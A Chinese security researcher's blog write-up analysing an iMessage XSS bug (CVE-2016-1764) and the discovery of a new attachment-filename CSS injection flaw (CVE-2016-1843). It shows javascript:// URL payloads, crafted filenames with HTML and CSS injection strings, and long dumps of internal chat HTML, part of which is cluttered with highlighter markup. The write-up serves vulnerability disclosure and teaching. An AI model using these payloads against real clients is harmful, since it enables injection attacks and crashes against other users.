Author: SuperHei (知道创宇404安全实验室) Date: 2016-04-08
注:文章里“0day”在报告给官方后分配漏洞编号:CVE-2016-1843
在前几天老外发布了一个在3月更新里修复的 iMessage xss 漏洞(CVE-2016-1764)细节 :
他们公布这些细节里其实没有给出详细触发点的分析,我分析后也就是根据这些信息发现了一个新的 0day。
CVE-2016-1764 里的最简单的触发payload: javascript://a/research?%0d%0aprompt(1) 可以看出这个是很明显javascript协议里的一个小技巧 %0d%0 没处理后导致的 xss ,这个 tips 在找 xss 漏洞里是比较常见的。
这个值得提一下的是 为啥要用prompt(1) 而我们常用的是alert(1) ,我实际测试了下发现 alert 确实没办法弹出来,另外在很多的网站其实把 alert 直接和谐过滤了,所以这里给提醒大家的是在测试xss的时候,把 prompt 替换 alert 是有必要的~
遇到这样的客户端的 xss 如果要分析,第一步应该看看 location.href 的信息。这个主要是看是哪个域下,这个漏洞是在applewebdata://协议下,这个原漏洞分析里有给出。然后要看具体的触发点,一般在浏览器下我们可以通过看 html 源代码来分析,但是在客户端下一般看不到,所以这里用到一个小技巧:
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)
这里是 html 里的 head 代码
<style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">继续看下 body 的代码:
javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span> <span class="token operator"><</span>chatitem id<span class="token operator">=</span><span class="token string">"<a class="token email-link" href="mailto:v:iMessage/xxx@xxx.com">v:iMessage/xxx@xxx.com</a>/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<span class="token operator">=</span><span class="token string">"no"</span> role<span class="token operator">=</span><span class="token string">"heading"</span> aria<span class="token operator">-</span>level<span class="token operator">=</span><span class="token string">"1"</span> item<span class="token operator">-</span>type<span class="token operator">=</span><span class="token string">"header"</span><span class="token operator">></span><span class="token operator"><</span>header guid<span class="token operator">=</span><span class="token string">"<a class="token email-link" href="mailto:v:iMessage/xxx@xxx.com">v:iMessage/xxx@xxx.com</a>/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span><span class="token operator">></span><span class="token operator"><</span>headermessage text<span class="token operator">-</span>direction<span class="token operator">=</span><span class="token string">"ltr"</span><span class="token operator">></span>与“<a class="token email-link" href="mailto:xxx@xxx">xxx@xxx</a><span class="token punctuation">.</span>com”进行 iMessage 通信<span class="token operator"><</span><span class="token operator">/</span>headermessage<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>header<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>chatitem<span class="token operator">></span><span class="token operator"><</span>chatitem id<span class="token operator">=</span><span class="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<span class="token operator">=</span><span class="token string">"no"</span> role<span class="token operator">=</span><span class="token string">"heading"</span> aria<span class="token operator">-</span>level<span class="token operator">=</span><span class="token string">"2"</span> item<span class="token operator">-</span>type<span class="token operator">=</span><span class="token string">"timestamp"</span><span class="token operator">></span><span class="token operator"><</span>timestamp guid<span class="token operator">=</span><span class="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> id<span class="token operator">=</span><span class="token string">"d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span><span class="token operator">></span><span class="token operator"><</span>date date<span class="token operator">=</span><span class="token string">"481908183.907740"</span><span class="token operator">></span>今天 <span class="token number">23</span><span class="token punctuation">:</span><span class="token number">23</span><span class="token operator"><</span><span class="token operator">/</span>date<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>timestamp<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>chatitem<span class="token operator">></span><span class="token operator"><</span>chatitem id<span class="token operator">=</span><span class="token string">"p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> contiguous<span class="token operator">=</span><span class="token string">"no"</span> chatitem<span class="token operator">-</span>message<span class="token operator">=</span><span class="token string">"yes"</span> role<span class="token operator">=</span><span class="token string">"presentation"</span> display<span class="token operator">-</span>type<span class="token operator">=</span><span class="token string">"balloon"</span> item<span class="token operator">-</span>type<span class="token operator">=</span><span class="token string">"text"</span> group<span class="token operator">-</span>last<span class="token operator">-</span>message<span class="token operator">-</span>ignore<span class="token operator">-</span>timestamps<span class="token operator">=</span><span class="token string">"yes"</span> group<span class="token operator">-</span>first<span class="token operator">-</span>message<span class="token operator">-</span>ignore<span class="token operator">-</span>timestamps<span class="token operator">=</span><span class="token string">"yes"</span><span class="token operator">></span><span class="token operator"><</span>message guid<span class="token operator">=</span><span class="token string">"p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"</span> service<span class="token operator">=</span><span class="token string">"imessage"</span> typing<span class="token operator">-</span>indicator<span class="token operator">=</span><span class="token string">"no"</span> sent<span class="token operator">=</span><span class="token string">"no"</span> from<span class="token operator">-</span>me<span class="token operator">=</span><span class="token string">"yes"</span> from<span class="token operator">-</span>system<span class="token operator">=</span><span class="token string">"no"</span> from<span class="token operator">=</span><span class="token string">"B392EC10-CA04-41D3-A967-5BB95E301475"</span> emote<span class="token operator">=</span><span class="token string">"no"</span> played<span class="token operator">=</span><span class="token string">"no"</span> auto<span class="token operator">-</span>reply<span class="token operator">=</span><span class="token string">"no"</span> group<span class="token operator">-</span>last<span class="token operator">-</span>message<span class="token operator">=</span><span class="token string">"yes"</span> group<span class="token operator">-</span>first<span class="token operator">-</span>message<span class="token operator">=</span><span class="token string">"yes"</span><span class="token operator">></span><span class="token operator"><</span>buddyicon role<span class="token operator">=</span><span class="token string">"img"</span> aria<span class="token operator">-</span>label<span class="token operator">=</span><span class="token string">"黑哥"</span><span class="token operator">></span><span class="token operator"><</span>div<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>div<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>buddyicon<span class="token operator">></span><span class="token operator"><</span>messagetext<span class="token operator">></span><span class="token operator"><</span>messagebody title<span class="token operator">=</span><span class="token string">"今天 23:23:03"</span> aria<span class="token operator">-</span>label<span class="token operator">=</span><span class="token string">"javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"</span><span class="token operator">></span><span class="token operator"><</span>messagetextcontainer text<span class="token operator">-</span>direction<span class="token operator">=</span><span class="token string">"ltr"</span><span class="token operator">></span><span class="token operator"><</span>span style<span class="token operator">=</span><span class="token string">""</span><span class="token operator">></span><span class="token operator"><</span>a href<span class="token operator">=</span><span class="token string">" "</span> title<span class="token operator">=</span>"javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span> <span class="token function">prompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="</span>compact<span class="token string">"></date></message><spacer></spacer></chatitem><chatitem id="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span><span class="token number">64989837</span><span class="token operator">-</span><span class="token number">6626</span><span class="token operator">-</span>44CE<span class="token operator">-</span>A689<span class="token operator">-</span>5460313DC817<span class="token string">" contiguous="</span>no<span class="token string">" chatitem-message="</span>yes<span class="token string">" role="</span>presentation<span class="token string">" display-type="</span>balloon<span class="token string">" item-type="</span>text<span class="token string">" group-first-message-ignore-timestamps="</span>yes<span class="token string">" group-last-message-ignore-timestamps="</span>yes<span class="token string">"><message guid="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span><span class="token number">64989837</span><span class="token operator">-</span><span class="token number">6626</span><span class="token operator">-</span>44CE<span class="token operator">-</span>A689<span class="token operator">-</span>5460313DC817<span class="token string">" typing-indicator="</span>no<span class="token string">" sent="</span>no<span class="token string">" from-me="</span>no<span class="token string">" from-system="</span>no<span class="token string">" from="</span>D8FAE154<span class="token operator">-</span>6C88<span class="token operator">-</span>4FB6<span class="token operator">-</span>9D2D<span class="token operator">-</span>0C234BEA8E99<span class="token string">" emote="</span>no<span class="token string">" played="</span>no<span class="token string">" auto-reply="</span>no<span class="token string">" group-first-message="</span>yes<span class="token string">" group-last-message="</span>yes<span class="token string">"><buddyicon role="</span>img<span class="token string">" aria-label="</span>黑哥<span class="token string">"><div></div></buddyicon><messagetext><messagebody title="</span>今天 <span class="token number">23</span><span class="token punctuation">:</span><span class="token number">23</span><span class="token punctuation">:</span><span class="token number">03</span><span class="token string">" aria-label="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">"><messagetextcontainer text-direction="</span>ltr<span class="token string">"><span style="</span><span class="token string">"><a href="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">" title="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span> <span class="token function">prompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="</span>compact<span class="token string">"></date></message><spacer></spacer></chatitem><chatitem id="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span>AE1ABCF1<span class="token number">-2397</span><span class="token operator">-</span>4F20<span class="token operator">-</span>A71F<span class="token operator">-</span>D71FFE8042F5<span class="token string">" contiguous="</span>no<span class="token string">" chatitem-message="</span>yes<span class="token string">" role="</span>presentation<span class="token string">" display-type="</span>balloon<span class="token string">" item-type="</span>text<span class="token string">" group-last-message-ignore-timestamps="</span>yes<span class="token string">" group-first-message-ignore-timestamps="</span>yes<span class="token string">"><message guid="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span>AE1ABCF1<span class="token number">-2397</span><span class="token operator">-</span>4F20<span class="token operator">-</span>A71F<span class="token operator">-</span>D71FFE8042F5<span class="token string">" service="</span>imessage<span class="token string">" typing-indicator="</span>no<span class="token string">" sent="</span>no<span class="token string">" from-me="</span>yes<span class="token string">" from-system="</span>no<span class="token string">" from="</span>B392EC10<span class="token operator">-</span>CA04<span class="token operator">-</span>41D3<span class="token operator">-</span>A967<span class="token operator">-</span>5BB95E301475<span class="token string">" emote="</span>no<span class="token string">" played="</span>no<span class="token string">" auto-reply="</span>no<span class="token string">" group-last-message="</span>yes<span class="token string">" group-first-message="</span>yes<span class="token string">"><buddyicon role="</span>img<span class="token string">" aria-label="</span>黑哥<span class="token string">"><div></div></buddyicon><messagetext><messagebody title="</span>今天 <span class="token number">23</span><span class="token punctuation">:</span><span class="token number">24</span><span class="token punctuation">:</span><span class="token number">51</span><span class="token string">" aria-label="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">"><messagetextcontainer text-direction="</span>ltr<span class="token string">"><span style="</span><span class="token string">"><a href="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">" title="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span> <span class="token function">prompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="</span>compact<span class="token string">"></date></message><spacer></spacer></chatitem><chatitem id="</span>s<span class="token punctuation">:</span>AE1ABCF1<span class="token number">-2397</span><span class="token operator">-</span>4F20<span class="token operator">-</span>A71F<span class="token operator">-</span>D71FFE8042F5<span class="token string">" contiguous="</span>no<span class="token string">" role="</span>heading<span class="token string">" aria-level="</span><span class="token number">1</span><span class="token string">" item-type="</span>status<span class="token string">" receipt-fade="</span><span class="token keyword">in</span><span class="token string">"><receipt from-me="</span>YES<span class="token string">" id="</span>receipt<span class="token operator">-</span>delivered<span class="token operator">-</span>s<span class="token punctuation">:</span>ae1abcf1<span class="token number">-2397</span><span class="token operator">-</span>4f20<span class="token operator">-</span>a71f<span class="token operator">-</span>d71ffe8042f5<span class="token string">"><div class="</span>receipt<span class="token operator">-</span>container<span class="token string">"><div class="</span>receipt<span class="token operator">-</span>item<span class="token string">">已送达</div></div></receipt></chatitem><chatitem id="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span><span class="token number">43545678</span><span class="token operator">-</span>5DB7<span class="token operator">-</span>4B35<span class="token operator">-</span>8B81<span class="token operator">-</span>xxxxxxxxxxxx<span class="token string">" contiguous="</span>no<span class="token string">" chatitem-message="</span>yes<span class="token string">" role="</span>presentation<span class="token string">" display-type="</span>balloon<span class="token string">" item-type="</span>text<span class="token string">" group-first-message-ignore-timestamps="</span>yes<span class="token string">" group-last-message-ignore-timestamps="</span>yes<span class="token string">"><message guid="</span>p<span class="token punctuation">:</span><span class="token number">0</span><span class="token operator">/</span><span class="token number">43545678</span><span class="token operator">-</span>5DB7<span class="token operator">-</span>4B35<span class="token operator">-</span>8B81<span class="token operator">-</span>xxxxxxxxxxxx<span class="token string">" typing-indicator="</span>no<span class="token string">" sent="</span>no<span class="token string">" from-me="</span>no<span class="token string">" from-system="</span>no<span class="token string">" from="</span>D8FAE154<span class="token operator">-</span>6C88<span class="token operator">-</span>4FB6<span class="token operator">-</span>9D2D<span class="token operator">-</span>0C234BEA8E99<span class="token string">" emote="</span>no<span class="token string">" played="</span>no<span class="token string">" auto-reply="</span>no<span class="token string">" group-first-message="</span>yes<span class="token string">" group-last-message="</span>yes<span class="token string">"><buddyicon role="</span>img<span class="token string">" aria-label="</span>黑哥<span class="token string">"><div></div></buddyicon><messagetext><messagebody title="</span>今天 <span class="token number">23</span><span class="token punctuation">:</span><span class="token number">24</span><span class="token punctuation">:</span><span class="token number">51</span><span class="token string">" aria-label="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">"><messagetextcontainer text-direction="</span>ltr<span class="token string">"><span style="</span><span class="token string">"><a href="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">" title="</span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span> <span class="token function">prompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token string">">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="</span>compact"<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>date<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>message<span class="token operator">></span><span class="token operator"><</span>spacer<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>spacer<span class="token operator">></span><span class="token operator"><</span><span class="token operator">/</span>chatitem<span class="token operator">></span>
那么关键的触发点:
<span class="token operator"><</span>a href<span class="token operator">=</span><span class="token string">"javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"</span> title<span class="token operator">=</span>"javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span> <span class="token function">prompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span>"<span class="token operator">></span>javascript<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>a<span class="token operator">/</span>research<span class="token operator">?</span><span class="token operator">%</span>0d<span class="token operator">%</span><span class="token function">0aprompt<span class="token punctuation">(</span></span><span class="token number">1</span><span class="token punctuation">,</span>document<span class="token punctuation">.</span>head<span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token operator"><</span><span class="token operator">/</span>a <span class="token operator">></span>
就是这个了。 javascript 直接进入 a 标签里的 href,导致点击执行。新版本的修复方案是直接不解析javascript:// 。
XSS 的漏洞本质是你注入的代码最终被解析执行了,既然我们看到了document.head.innerHTML的情况,那么有没有其他注入代码的机会呢?首先我测试的肯定是还是那个点,尝试用"及<>去闭合,可惜都被过滤了,这个点不行我们可以看看其他存在输入的点,于是我尝试发个附件看看解析情况,部分代码如下:
<chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件传输: tttt.html"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"><transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">< img class="transfer-icon" extension="html" aria-label="文件扩展名: html" style="content: -webkit-image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);"><span class="transfer-text" color-important="no">tttt</span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="显示" id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>
发了个tttt.html的附件,这个附件的文件名出现在代码里,或许有控制的机会。多长测试后发现过滤也比较严格,不过最终还是发现一个潜在的点,也就是文件名的扩展名部分:
<chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 16:46:10" file-transfer-element="yes" aria-label="文件传输: testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458"><transfer-atom draggable="true" aria-label="testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458">< img class="transfer-icon" extension="htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" aria-label="文件扩展名: htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);"><span class="transfer-text" color-important="no">testzzzzzzz"'><img src=1></span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="显示" id="filetransfer-button-A6BE6666-ADBF-4039-BF45-042D261EA458" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>
我们提交的附件的后缀进入了 style :
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);
也就是可能导致 css 注入,或许我们还有机会,不过经过测试也是有过滤处理的,比如/ 直接被转为了:这个非常有意思 所谓“成也萧何,败也萧何”,如果你要注入css那么肯定给属性给值就得用: 但是:又不能出现在文件名里,然后我们要注入 css 里掉用远程css或者图片需要用/ 而/又被处理了变成了:
不管怎么样我先注入个css测试下,于是提交了一附件名:zzzzzz.htm) 1x);color/red;aaa/((
按推断/变为了: 如果注入成功应该是:
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x);color:red;aaa:((
当我提交测试发送这个附件的时候,我的 iMessage 崩溃了~~ 这里我想我发现了一个新的漏洞,于是我升级 OSX 到最新的系统重新测试结果:一个全新的 0day 诞生!
当然这里还有很多地方可以测试,也有一些思路也可以去测试下,比如那个名字那里这个应该是可控制的,比如附件是保存在本地的有没有可能存在目录专挑导致写到任意目录的地方。有需求的可以继续测试下,说不定下个 0day 就是你的 :)
最后我想说的是在分析别人发现的漏洞的时候一定要找到漏洞的关键,然后总结提炼出“模型”,然后去尝试新的攻击思路或者界面!